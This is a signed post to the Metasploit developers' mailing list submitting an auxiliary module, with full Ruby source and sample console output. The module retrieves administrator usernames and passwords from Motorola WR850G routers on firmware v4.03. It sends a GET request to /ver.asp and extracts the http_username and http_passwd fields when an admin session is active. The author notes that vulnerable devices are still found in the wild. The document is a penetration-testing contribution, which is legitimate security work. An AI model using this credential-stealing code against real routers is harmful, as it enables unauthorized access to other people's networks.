-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hey guys,
I've attached a new auxiliary module for obtaining the login credentials to a
Motorola WR850G router with firmware v4.03. I just put it under admin, but
there is probably a better place for it.
msf auxiliary(wr850g_cred) > run
[*] Found username "xxxx" and password "yyyy"
[*] Auxiliary module execution completed
msf > info admin/wr850g_cred
Name: Motorola WR850G v4.03 Credentials
Version: 1
Provided by:
Kris Katterjohn <[EMAIL PROTECTED]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 80 yes The target port
Description:
Login credentials to the Motorola WR850G router with firmware v4.03
can be obtained via a simple GET request if issued while the
administrator is logged in. A lot more information is available
through this request, but you can get it all and more after logging
in.
This was disclosed back in Sep 2004, but I still easily found one lying around
with this firmware.
Thanks,
Kris Katterjohn
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iQIVAwUBSOhXA/9K37xXYl36AQJ9Ww//e5dyR9E4yqoIYYqARyOlyJ47mAQvxmpK
mmsLFjOQaqmupEpb7fk85zB3YEHqgYwDp6eLKgsZ4T0xGjmq4PcE1JH8c5L5Vdwd
p9lx1HLkzU759Dk9azcHDhTDSYsvGxxuVShbQiYLX8G0u+M8toiJqJ9iFNFkc3mO
sDP681NG7hG0i8kB0myWkXBhuVk+qc5S1hThmaCyqTNKFnjckCfRvsU/8Y1/IiOp
of0LGIayxn4RPhPXMpaXxowhEE+ey5xMKgYpkl7c7Rg7+fAU5LIHQwUEBlP1szv9
9CXuB5WNl8wMSGGZ62ktu3zQIi901LEQxO7W87KmePi7g087tBu60EM5+gz/qIto
xuxvToutzlBAdhtxKx09XRXTlcRlm3P/AxXJP7neXP8QxEwgR3swsPtTzf0vMOb5
vykTFSBrhbWP13WIhNH8gPN5zOEXV8RzY4pbJklSZ106TTDRH2dY6b8eLA2jW03L
2BtJAhO6GFL5cYbf28r2yIIqFauy13MGgqhjI/p/rRsxYAMh7ITL5388YVLm+QYd
vAPxGxztIla2MHeB/C6sAzj9+U2db/ItISg+W1Cn56+Mhkcou8Nd4NIqlhZbzwUm
v3u3SoToa6f0GpAlTyjqwf0+ydHmWL+xRbiIb0pJQJzEohkksf9/6uBQ1B/08wyn
YKKXU8cKEmk=
=VU+S
-----END PGP SIGNATURE-----
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Motorola WR850G v4.03 Credentials',
'Description' => %q{
Login credentials to the Motorola WR850G router
with
firmware v4.03 can be obtained via a simple GET
request
if issued while the administrator is logged in.
A lot
more information is available through this
request, but
you can get it all and more after logging in.
},
'Author' => 'Kris Katterjohn <[EMAIL
PROTECTED]>',
'License' => MSF_LICENSE,
'Version' => '1',
'References' =>
[ [ 'URL',
'http://seclists.org/bugtraq/2004/Sep/0339.html'] ],
'DisclosureDate' => 'Sep 24 2004'))
register_options([Opt::RPORT(80)])
end
def run
connect
sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")
response = sock.get
disconnect
if response.nil? or response.empty?
print_status("No response from server")
return
end
# 302 Redirect
if response.split(/\r\n/)[0] !~ /200 Ok/
print_status("Administrator not logged in")
return
end
user = $1 if response.match("http_username=([^\n]*)<br>")
pass = $1 if response.match("http_passwd=([^\n]*)<br>")
print_status("Found username \"#{user}\" and password
\"#{pass}\"") if user and pass
end
end
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
